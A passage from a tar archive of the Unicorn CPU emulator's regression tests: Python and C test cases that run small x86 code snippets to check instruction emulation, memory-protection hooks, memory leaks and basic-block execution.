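# selector 0xFFFF -- the low 16 bits of EAX, well past the default GDT
# limit -- raises #GP on real hardware, which Unicorn reports as
# UC_ERR_EXCEPTION; that is what the assertion above relies on.)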
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/movsd.py����������������������������������������������������������������0000775�0000000�0000000�00000001640�14675241067�0017526�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # By Ryan Hileman, issue #3 from capstone import * from unicorn import * from unicorn.x86_const import * import regress code = 'f20f1005aa120000'.decode('hex') def dis(mem, addr): md = Cs(CS_ARCH_X86, CS_MODE_64) return '\n'.join([ '%s %s' % (i.mnemonic, i.op_str) for i in md.disasm(str(mem), addr) ]) def hook_code(uc, addr, size, user_data): mem = uc.mem_read(addr, size) print 'instruction size:', size print 'instruction:', str(mem).encode('hex'), dis(mem, addr) print 'reference: ', code.encode('hex'), dis(code, addr) class Movsd(regress.RegressTest): def runTest(self): addr = 0x400000 mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.hook_add(UC_HOOK_CODE, hook_code) mu.mem_map(addr, 8 * 1024 * 1024) mu.mem_write(addr, code) mu.emu_start(addr, addr + len(code)) if __name__ == '__main__': regress.main() ������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/nr_mem_test.c�����������������������������������������������������������0000664�0000000�0000000�00000006224�14675241067�0020504�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Non-readable memory test case Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
*/

#include <string.h>
#include <unicorn/unicorn.h>

const uint8_t PROGRAM[] =
    "\x8b\x1d\x00\x00\x30\x00\xa1\x00\x00\x40\x00";
// total size: 11 bytes

/*
   bits 32

   mov ebx, [0x300000]
   mov eax, [0x400000]
*/

// callback for tracing memory access (READ or WRITE)
static bool hook_mem_invalid(uc_engine *uc, uc_mem_type type, uint64_t address,
                             int size, int64_t value, void *user_data)
{
    switch(type) {
    default:
        // return false to indicate we want to stop emulation
        return false;
    case UC_MEM_READ_PROT:
        printf(">>> non-readable memory is being read at 0x%"PRIx64
               ", data size = %u\n", address, size);
        return false;
    }
}

int main(int argc, char **argv, char **envp)
{
    uc_engine *uc;
    uc_hook trace1;
    uc_err err;
    uint32_t eax, ebx;

    printf("Memory protections test\n");

    // Initialize emulator in X86-32bit mode
    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if (err) {
        printf("Failed on uc_open() with error returned: %u\n", err);
        return 1;
    }

    uc_mem_map(uc, 0x100000, 0x1000, UC_PROT_READ);
    uc_mem_map(uc, 0x300000, 0x1000, UC_PROT_READ | UC_PROT_WRITE);
    uc_mem_map(uc, 0x400000, 0x1000, UC_PROT_WRITE);

    // write machine code to be emulated to memory
    if (uc_mem_write(uc, 0x100000, PROGRAM, sizeof(PROGRAM))) {
        printf("Failed to write emulation code to memory, quit!\n");
        return 2;
    } else {
        printf("Allowed to write to read only memory via uc_mem_write\n");
    }

    uc_mem_write(uc, 0x300000, (const uint8_t*)"\x41\x41\x41\x41", 4);
    uc_mem_write(uc, 0x400000, (const uint8_t*)"\x42\x42\x42\x42", 4);

    //uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 0x400000, 0x400fff);

    // intercept invalid memory events
    uc_hook_add(uc, &trace1, UC_HOOK_MEM_READ_PROT, hook_mem_invalid, NULL, 1, 0);

    // emulate machine code, stopping after at most 2 instructions
    printf("BEGIN execution\n");
    err = uc_emu_start(uc, 0x100000, 0x100000 + sizeof(PROGRAM), 0, 2);
    if (err) {
        printf("Expected failure on uc_emu_start() with error returned %u: %s\n",
               err, uc_strerror(err));
    } else {
        printf("UNEXPECTED uc_emu_start returned UC_ERR_OK\n");
    }
    printf("END execution\n");

    uc_reg_read(uc, UC_X86_REG_EAX, &eax);
    printf("Final eax = 0x%x\n", eax);
    uc_reg_read(uc, UC_X86_REG_EBX, &ebx);
    printf("Final ebx = 0x%x\n", ebx);

    uc_close(uc);

    return 0;
}
unicorn-2.1.1/tests/regress/osx_qemu_thread_create_crash.py
#!/usr/bin/env python
import platform
import resource

from unicorn import *

import regress

# OS X: OK with 2047 iterations.
# OS X: Crashes at the 2048th iteration ("qemu: qemu_thread_create: Resource temporarily unavailable").
# Linux: No crashes observed.
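# (Illustrative note, not part of the original test: each Uc() instance below
# owns a full emulator context and is only released by Python garbage
# collection, so the loop effectively probes per-process resource limits --
# consistent with the qemu_thread_create failure quoted above.)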
class ThreadCreateCrash(regress.RegressTest): def test(self): for i in xrange(2048): Uc(UC_ARCH_X86, UC_MODE_64) self.assertTrue(True, "If not reached, then we have a crashing bug.") if __name__ == '__main__': regress.main() �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/potential_memory_leak.py������������������������������������������������0000775�0000000�0000000�00000001664�14675241067�0022767�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python import platform import resource from unicorn import * import regress class MemoryLeak(regress.RegressTest): def test(self): if platform.system() == "Darwin": rusage_multiplier = 1 elif platform.system() == "Linux": rusage_multiplier = 1024 else: # resource.getrusage(...) is platform dependent. Only tested under OS X and Linux. return max_rss_before = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * rusage_multiplier for i in xrange(10000): mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0, 4096) mu.emu_start(0, 0) max_rss_after = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * rusage_multiplier rss_increase_per_iteration = (max_rss_after - max_rss_before) / i self.assertLess(rss_increase_per_iteration, 8000) if __name__ == '__main__': regress.main() ����������������������������������������������������������������������������unicorn-2.1.1/tests/regress/pshufb.py���������������������������������������������������������������0000775�0000000�0000000�00000000714�14675241067�0017666�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # By Ryan Hileman, issue #91 # Invalid instruction = test failed from unicorn import * from unicorn.x86_const import * import regress class Pshufb(regress.RegressTest): def runTest(self): uc = Uc(UC_ARCH_X86, UC_MODE_64) uc.mem_map(0x2000, 0x1000) # pshufb xmm0, xmm1 uc.mem_write(0x2000, '660f3800c1'.decode('hex')) uc.emu_start(0x2000, 0x2005) if __name__ == '__main__': regress.main() 
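# (Illustrative note, not part of the original test: 66 0f 38 00 c1 is the
# SSSE3 encoding of "pshufb xmm0, xmm1", so this only executes when the
# emulated CPU model advertises SSSE3; on builds where it did not, emu_start
# raised the invalid-instruction error this regression guards against.)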
����������������������������������������������������unicorn-2.1.1/tests/regress/reg_write_sign_extension.py���������������������������������������������0000775�0000000�0000000�00000001657�14675241067�0023511�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python """See https://github.com/unicorn-engine/unicorn/issues/98""" import unicorn import regress ADDR = 0xffaabbcc def hook_mem_invalid(mu, access, address, size, value, user_data): print ">>> Access type: %u, expected value: 0x%x, actual value: 0x%x" % (access, ADDR, address) assert(address == ADDR) mu.mem_map(address & 0xfffff000, 4 * 1024) mu.mem_write(address, b'\xcc') return True class RegWriteSignExt(regress.RegressTest): def runTest(self): mu = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) mu.reg_write(unicorn.x86_const.UC_X86_REG_EBX, ADDR) mu.mem_map(0x10000000, 1024 * 4) # jmp ebx mu.mem_write(0x10000000, b'\xff\xe3') mu.hook_add(unicorn.UC_HOOK_MEM_FETCH_UNMAPPED | unicorn.UC_HOOK_MEM_FETCH_PROT, hook_mem_invalid) mu.emu_start(0x10000000, 0x10000000 + 2, count=1) if __name__ == '__main__': regress.main() ���������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/regress.py��������������������������������������������������������������0000775�0000000�0000000�00000001466�14675241067�0020056�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python import unittest from os.path import dirname, basename, isfile import glob # Find all unittest type in this directory and run it. class RegressTest(unittest.TestCase): pass def main(): unittest.main() if __name__ == '__main__': directory = dirname(__file__) if directory == '': directory = '.' 
modules = glob.glob(directory+"/*.py") __all__ = [ basename(f)[:-3] for f in modules if isfile(f)] suite = unittest.TestSuite() for module in __all__: m = __import__(module) for cl in dir(m): try: realcl = getattr(m,cl) if issubclass(realcl, unittest.TestCase): suite.addTest(realcl()) except Exception as e: pass unittest.TextTestRunner().run(suite) ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/regress.sh��������������������������������������������������������������0000775�0000000�0000000�00000000412�14675241067�0020026�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/sh ./map_crash ./map_write ./sigill ./sigill2 ./block_test ./ro_mem_test ./nr_mem_test ./timeout_segfault ./rep_movsb ./mem_unmap ./mem_protect ./mem_exec ./mem_map_large ./00opcode_uc_crash ./eflags_noset ./eflags_nosync ./mips_kseg0_1 ./mem_double_unmap ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/rep_hook.py�������������������������������������������������������������0000775�0000000�0000000�00000001220�14675241067�0020176�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * import regress PAGE_SIZE = 4 * 1024 CODE = b'\xf3\xaa' # rep stosb def hook_code(uc, addr, size, user_data): print("hook called at %x" %addr) class REP(regress.RegressTest): def test_rep(self): mu = Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(0, PAGE_SIZE) mu.mem_write(0, CODE) mu.reg_write(UC_X86_REG_ECX, 3) mu.reg_write(UC_X86_REG_EDI, 0x100) mu.hook_add(UC_HOOK_CODE, hook_code) mu.emu_start(0, len(CODE)) self.assertEqual(0, mu.reg_read(UC_X86_REG_ECX)) if __name__ == '__main__': regress.main() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/rep_movsb.c�������������������������������������������������������������0000664�0000000�0000000�00000012716�14675241067�0020167�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* rep movsb 
regression Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #define __STDC_FORMAT_MACROS #include <string.h> #include <stdlib.h> #include <string.h> #include <time.h> #include <unicorn/unicorn.h> unsigned char PROGRAM[] = "\xbe\x00\x00\x20\x00\xbf\x00\x10\x20\x00\xb9\x14\x00\x00\x00\xf3" "\xa4\xf4"; // total size: 18 bytes /* bits 32 ; assumes code section at 0x100000 r-x ; assumes data section at 0x200000-0x202000, rw- mov esi, 0x200000 mov edi, 0x201000 mov ecx, 20 rep movsb hlt */ static int log_num = 1; // callback for tracing instruction static void hook_code(uc_engine *uc, uint64_t addr, uint32_t size, void *user_data) { uint8_t opcode; if (uc_mem_read(uc, addr, &opcode, 1) != UC_ERR_OK) { printf("not ok %d - uc_mem_read fail during hook_code callback, addr: 0x%" PRIx64 "\n", log_num++, addr); _exit(-1); } switch (opcode) { case 0xf4: //hlt printf("# Handling HLT\n"); if (uc_emu_stop(uc) != UC_ERR_OK) { printf("not ok %d - uc_emu_stop fail during hook_code callback, addr: 0x%" PRIx64 "\n", log_num++, addr); _exit(-1); } else { printf("ok %d - hlt encountered, uc_emu_stop called\n", log_num++); } break; default: //all others break; } } // callback for tracing memory access (READ or WRITE) static void hook_mem_write(uc_engine *uc, uc_mem_type type, uint64_t addr, int size, int64_t value, void *user_data) { printf("# write to memory at 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", addr, size, value); if (addr < 0x201000L) { //this is actually a read, we don't write in this range printf("not ok %d - write hook called for read of 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", log_num++, addr, size, value); } else { printf("ok %d - write hook called for write of 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", log_num++, addr, size, value); } } int main(int argc, char **argv, char **envp) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint8_t buf1[100], readbuf[100]; printf("# rep movsb test\n"); memset(buf1, 'A', 20); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("not ok %d - Failed on uc_open() with error returned: %u\n", log_num++, err); return 1; } else { printf("ok %d - uc_open() success\n", log_num++); } uc_mem_map(uc, 0x100000, 0x1000, UC_PROT_READ); uc_mem_map(uc, 0x200000, 0x2000, UC_PROT_READ | UC_PROT_WRITE); // fill in the data that we want to copy if (uc_mem_write(uc, 0x200000, buf1, 20)) { printf("not ok %d - Failed to write read buffer to memory, quit!\n", log_num++); return 2; } else { printf("ok %d - Read buffer written to memory\n", log_num++); } // write machine code to be emulated to memory if (uc_mem_write(uc, 0x100000, PROGRAM, sizeof(PROGRAM))) { printf("not ok %d - Failed to write emulation code to memory, quit!\n", log_num++); return 4; } else { printf("ok %d - Program written to memory\n", log_num++); } if (uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0) != 
UC_ERR_OK) { printf("not ok %d - Failed to install UC_HOOK_CODE handler\n", log_num++); return 5; } else { printf("ok %d - UC_HOOK_CODE installed\n", log_num++); } // intercept memory write events only, NOT read events if (uc_hook_add(uc, &trace1, UC_HOOK_MEM_WRITE, hook_mem_write, NULL, 1, 0) != UC_ERR_OK) { printf("not ok %d - Failed to install UC_HOOK_MEM_WRITE handler\n", log_num++); return 6; } else { printf("ok %d - UC_HOOK_MEM_WRITE installed\n", log_num++); } // emulate machine code until told to stop by hook_code printf("# BEGIN execution\n"); err = uc_emu_start(uc, 0x100000, 0x101000, 0, 0); if (err != UC_ERR_OK) { printf("not ok %d - Failure on uc_emu_start() with error %u:%s\n", log_num++, err, uc_strerror(err)); return 8; } else { printf("ok %d - uc_emu_start complete\n", log_num++); } printf("# END execution\n"); //make sure that data got copied // fill in sections that shouldn't get touched if (uc_mem_read(uc, 0x201000, readbuf, 20)) { printf("not ok %d - Failed to read random buffer 1 from memory\n", log_num++); } else { printf("ok %d - Random buffer 1 read from memory\n", log_num++); if (memcmp(buf1, readbuf, 20)) { printf("not ok %d - write buffer contents are incorrect\n", log_num++); } else { printf("ok %d - write buffer contents are correct\n", log_num++); } } if (uc_close(uc) == UC_ERR_OK) { printf("ok %d - uc_close complete\n", log_num++); } else { printf("not ok %d - uc_close complete\n", log_num++); } return 0; } ��������������������������������������������������unicorn-2.1.1/tests/regress/ro_mem_test.c�����������������������������������������������������������0000664�0000000�0000000�00000015634�14675241067�0020512�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Non-writable memory test case Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
*/

#include <string.h>
#include <unicorn/unicorn.h>

const uint8_t PROGRAM[] =
    "\xeb\x1a\x58\x83\xc0\x04\x83\xe0\xfc\x83\xc0\x01\xc7\x00\x78\x56"
    "\x34\x12\x83\xc0\x07\xc7\x00\x21\x43\x65\x87\x90\xe8\xe1\xff\xff"
    "\xff"
    "xxxxAAAAxxxBBBB";
// total size: 33 bytes

/*
   jmp short bottom
top:
   pop eax
   add eax, 4
   and eax, 0xfffffffc
   add eax, 1                     ; unaligned
   mov dword [eax], 0x12345678    ; try to write into code section
   add eax, 7                     ; aligned
   mov dword [eax], 0x87654321    ; try to write into code section
   nop
bottom:
   call top
*/

// callback for tracing instruction
/*static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data)
{
    uint32_t esp;
    printf(">>> Tracing instruction at 0x%"PRIx64 ", instruction size = 0x%x\n", address, size);

    uc_reg_read(uc, UC_X86_REG_ESP, &esp);
    printf(">>> --- ESP is 0x%x\n", esp);

}
*/

// callback for tracing memory access (READ or WRITE)
static bool hook_mem_invalid(uc_engine *uc, uc_mem_type type, uint64_t address,
                             int size, int64_t value, void *user_data)
{
    uint32_t esp;
    uc_reg_read(uc, UC_X86_REG_ESP, &esp);

    switch(type) {
    default:
        // return false to indicate we want to stop emulation
        return false;
    case UC_MEM_WRITE:
        //if this is a push, esp has not been adjusted yet
        if (esp == (address + size)) {
            uint32_t upper;
            upper = (esp + 0xfff) & ~0xfff;
            printf(">>> Stack appears to be missing at 0x%"PRIx64 ", allocating now\n", address);
            // map in a 0x8000-byte stack region ending at the page boundary above esp
            uc_mem_map(uc, upper - 0x8000, 0x8000, UC_PROT_READ | UC_PROT_WRITE);
            // return true to indicate we want to continue
            return true;
        }
        printf(">>> Missing memory is being WRITTEN at 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n",
               address, size, value);
        return false;
    case UC_MEM_WRITE_PROT:
        printf(">>> RO memory is being WRITTEN at 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n",
               address, size, value);
        return false;
    }
}

#define STACK       0x500000
#define STACK_SIZE  0x5000

int main(int argc, char **argv, char **envp)
{
    uc_engine *uc;
    uc_hook trace1;
    uc_err err;
    uint8_t bytes[8];
    uint32_t esp;
    int map_stack = 0;

    if (argc == 2 && strcmp(argv[1], "--map-stack") == 0) {
        map_stack = 1;
    }

    printf("Memory mapping test\n");

    // Initialize emulator in X86-32bit mode
    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if (err) {
        printf("Failed on uc_open() with error returned: %u\n", err);
        return 1;
    }

    uc_mem_map(uc, 0x100000, 0x1000, UC_PROT_ALL);
    uc_mem_map(uc, 0x200000, 0x2000, UC_PROT_ALL);
    uc_mem_map(uc, 0x300000, 0x3000, UC_PROT_ALL);
    uc_mem_map(uc, 0x400000, 0x4000, UC_PROT_READ);

    if (map_stack) {
        printf("Pre-mapping stack\n");
        uc_mem_map(uc, STACK, STACK_SIZE, UC_PROT_READ | UC_PROT_WRITE);
    } else {
        printf("Mapping stack on first invalid memory access\n");
    }

    esp = STACK + STACK_SIZE;

    uc_reg_write(uc, UC_X86_REG_ESP, &esp);

    // write machine code to be emulated to memory
    if (uc_mem_write(uc, 0x400000, PROGRAM, sizeof(PROGRAM))) {
        printf("Failed to write emulation code to memory, quit!\n");
        return 2;
    } else {
        printf("Allowed to write to read only memory via uc_mem_write\n");
    }

    //uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 0x400000, 0x400fff);

    // intercept invalid memory events
    uc_hook_add(uc, &trace1, UC_HOOK_MEM_WRITE_UNMAPPED | UC_HOOK_MEM_WRITE_PROT, hook_mem_invalid, NULL, 1, 0);

    // emulate machine code, stopping after at most 10 instructions
    printf("BEGIN execution - 1\n");
    err = uc_emu_start(uc, 0x400000, 0x400000 + sizeof(PROGRAM), 0, 10);
    if (err) {
        printf("Expected failure on uc_emu_start() with error returned %u: %s\n",
               err, uc_strerror(err));
    } else {
        printf("UNEXPECTED uc_emu_start
returned UC_ERR_OK\n"); } printf("END execution - 1\n"); // emulate machine code in infinite time printf("BEGIN execution - 2\n"); //update eax to point to aligned memory (same as add eax,7 above) uint32_t eax = 0x40002C; uc_reg_write(uc, UC_X86_REG_EAX, &eax); //resume execution at the mov dword [eax], 0x87654321 //to test an aligned write as well err = uc_emu_start(uc, 0x400015, 0x400000 + sizeof(PROGRAM), 0, 2); if (err) { printf("Expected failure on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } else { printf("UNEXPECTED uc_emu_start returned UC_ERR_OK\n"); } printf("END execution - 2\n"); printf("Verifying content at 0x400025 is unchanged\n"); if (!uc_mem_read(uc, 0x400025, bytes, 4)) { printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", (uint32_t)0x400025, *(uint32_t*) bytes); if (0x41414141 != *(uint32_t*) bytes) { printf("ERROR content in read only memory changed\n"); } else { printf("SUCCESS content in read only memory unchanged\n"); } } else { printf(">>> Failed to read 4 bytes from [0x%x]\n", (uint32_t)(esp - 4)); return 4; } printf("Verifying content at 0x40002C is unchanged\n"); if (!uc_mem_read(uc, 0x40002C, bytes, 4)) { printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", (uint32_t)0x40002C, *(uint32_t*) bytes); if (0x42424242 != *(uint32_t*) bytes) { printf("ERROR content in read only memory changed\n"); } else { printf("SUCCESS content in read only memory unchanged\n"); } } else { printf(">>> Failed to read 4 bytes from [0x%x]\n", (uint32_t)(esp - 4)); return 4; } printf("Verifying content at bottom of stack is readable and correct\n"); if (!uc_mem_read(uc, esp - 4, bytes, 4)) { printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", (uint32_t)(esp - 4), *(uint32_t*) bytes); } else { printf(">>> Failed to read 4 bytes from [0x%x]\n", (uint32_t)(esp - 4)); return 4; } uc_close(uc); return 0; } ����������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/run_across_bb.py��������������������������������������������������������0000775�0000000�0000000�00000017407�14675241067�0021227�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # # This test demonstrates emulation behavior within and across # basic blocks. 
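# (Illustrative note, not part of the original test: Unicorn, like QEMU,
# translates and caches guest code one basic block at a time, so asking
# emu_start() to stop at an address in the middle of a block exercises a
# different path than stopping exactly at a block boundary -- which is the
# behavior the two tests below compare.)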
from __future__ import print_function import binascii import regress import struct from unicorn import * from unicorn.x86_const import * CODE = binascii.unhexlify(b"".join([ b"b800000000", # 1000: b8 00 00 00 00 mov eax,0x0 b"40", # 1005: 40 inc eax b"40", # 1006: 40 inc eax b"6810100000", # 1007: 68 10 10 00 00 push 0x1010 b"c3", # 100c: c3 ret b"cc", # 100d: cc int3 b"cc", # 100e: cc int3 b"cc", # 100f: cc int3 b"b800000000", # 1010: b8 00 00 00 00 mov eax,0x0 b"40", # 1015: 40 inc eax b"40", # 1016: 40 inc eax ])) def showpc(mu): pc = mu.reg_read(UC_X86_REG_EIP) print("pc: 0x%x" % (pc)) class RunAcrossBBTest(regress.RegressTest): def test_run_all(self): try: ####################################################################### # emu SETUP ####################################################################### print("\n---- test: run_all ----") mu = Uc(UC_ARCH_X86, UC_MODE_32) def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) mu.hook_add(UC_HOOK_CODE, hook_code) # base of CODE mu.mem_map(0x1000, 0x1000) mu.mem_write(0x1000, CODE) # stack mu.mem_map(0x2000, 0x1000) mu.reg_write(UC_X86_REG_EIP, 0x1000) mu.reg_write(UC_X86_REG_ESP, 0x2800) self.assertEqual(0x1000, mu.reg_read(UC_X86_REG_EIP), "unexpected PC") self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP") showpc(mu) mu.emu_start(0x1000, 0x1016) # should exec the following four instructions: # 1000: b8 00 00 00 00 mov eax,0x0 < # 1005: 40 inc eax < # 1006: 40 inc eax < # 1007: 68 10 10 00 00 push 0x1010 < # 100c: c3 ret -----------+ # 100d: cc int3 | # 100e: cc int3 | # 100f: cc int3 | # 1010: b8 00 00 00 00 mov eax,0x0 <-+ # 1015: 40 inc eax < # 1016: 40 inc eax < self.assertEqual(0x1016, mu.reg_read(UC_X86_REG_EIP), "unexpected PC (2)") self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP (2)") showpc(mu) except UcError as e: if e.errno == UC_ERR_FETCH_UNMAPPED: # during initial test dev, bad fetch at 0x1010, but the data is there, # and this proves it print("!!! about to bail due to bad fetch... 
here's the data at PC:") print(binascii.hexlify(mu.mem_read(mu.reg_read(UC_X86_REG_EIP), 0x8))) self.assertFalse(True, "ERROR: %s @ 0x%x" % (e, mu.reg_read(UC_X86_REG_EIP))) def test_run_across_bb(self): try: ####################################################################### # emu SETUP ####################################################################### print("\n---- test: run_across_bb ----") mu = Uc(UC_ARCH_X86, UC_MODE_32) def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) mu.hook_add(UC_HOOK_CODE, hook_code) # base of CODE mu.mem_map(0x1000, 0x1000) mu.mem_write(0x1000, CODE) # stack mu.mem_map(0x2000, 0x1000) mu.reg_write(UC_X86_REG_EIP, 0x1000) mu.reg_write(UC_X86_REG_ESP, 0x2800) self.assertEqual(0x1000, mu.reg_read(UC_X86_REG_EIP), "unexpected PC") self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP") showpc(mu) ####################################################################### # emu_run ONE: # exectue four instructions, until the last instruction in a BB ####################################################################### mu.emu_start(0x1000, 0x100c) # should exec the following four instructions: # 1000: b8 00 00 00 00 mov eax,0x0 < # 1005: 40 inc eax < # 1006: 40 inc eax < # 1007: 68 10 10 00 00 push 0x1010 < # should be at 0x100c, as requested self.assertEqual(0x100c, mu.reg_read(UC_X86_REG_EIP), "unexpected PC (2)") # single push, so stack diff is 0x4 TOP_OF_STACK = 0x2800-0x4 self.assertEqual(TOP_OF_STACK, mu.reg_read(UC_X86_REG_ESP), "unexpected SP (2)") # top of stack should be 0x1010 self.assertEqual(0x1010, struct.unpack("<I", mu.mem_read(TOP_OF_STACK, 0x4))[0], "unexpected stack value") showpc(mu) ####################################################################### # emu_run TWO # execute one instruction that jumps to a new BB ####################################################################### mu.emu_start(0x100c, 0x1010) # should exec one instruction that jumps to 0x1010: # 100c: c3 ret -----------+ # 100d: cc int3 | # 100e: cc int3 | # 100f: cc int3 | # 1010: b8 00 00 00 00 mov eax,0x0 <-+ # should be at 0x1010, as requested self.assertEqual(0x1010, mu.reg_read(UC_X86_REG_EIP), "unexpected PC (3)") # single pop, so stack back at base self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP (3)") showpc(mu) ####################################################################### # emu_run THREE # execute three instructions to verify things work as expected ####################################################################### mu.emu_start(0x1010, 0x1016) # should exec the following three instructions: # 1010: b8 00 00 00 00 mov eax,0x0 < # 1015: 40 inc eax < # 1016: 40 inc eax < self.assertEqual(0x1016, mu.reg_read(UC_X86_REG_EIP), "unexpected PC (4): 0x%x vs 0x%x" % ( 0x1016, mu.reg_read(UC_X86_REG_EIP))) showpc(mu) except UcError as e: if e.errno == UC_ERR_FETCH_UNMAPPED: # during initial test dev, bad fetch at 0x1010, but the data is there, # and this proves it print("!!! about to bail due to bad fetch... 
here's the data at PC:") print(binascii.hexlify(mu.mem_read(mu.reg_read(UC_X86_REG_EIP), 0x8))) self.assertFalse(True, "ERROR: %s @ 0x%x" % (e, mu.reg_read(UC_X86_REG_EIP))) if __name__ == '__main__': regress.main() ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/rw_hookstack.c����������������������������������������������������������0000664�0000000�0000000�00000005264�14675241067�0020671�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdlib.h> #include <stdio.h> #include <unicorn/unicorn.h> #define ADDRESS 0x1000000 #define STACK 0x0020D000 #define STACK2 0x0030D000 #define STACK_SIZE 16384 #define SIZE (2 * 1024 * 1024) #define CODE32 "\x8B\x04\x24\xA3\x40\x00\x00\x01\xA1\x40\x00\x00\x01" bool hook_mem_rw(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { unsigned int EIP; uc_reg_read(uc, UC_X86_REG_EIP, &EIP); switch(type) { default: return false; break; case UC_MEM_WRITE: printf("Hooked write to address 0x%08"PRIX64" with value 0x%08"PRIX64" at EIP %08X\n", address, value, EIP); return true; break; case UC_MEM_READ: printf("Hooked read from address 0x%08"PRIX64" with value 0x%08"PRIX64" at EIP %08X\n", address, value, EIP); return true; break; } } int main(int argc, char *argv[]) { uc_engine *uc; uc_hook trace; uc_err err; unsigned 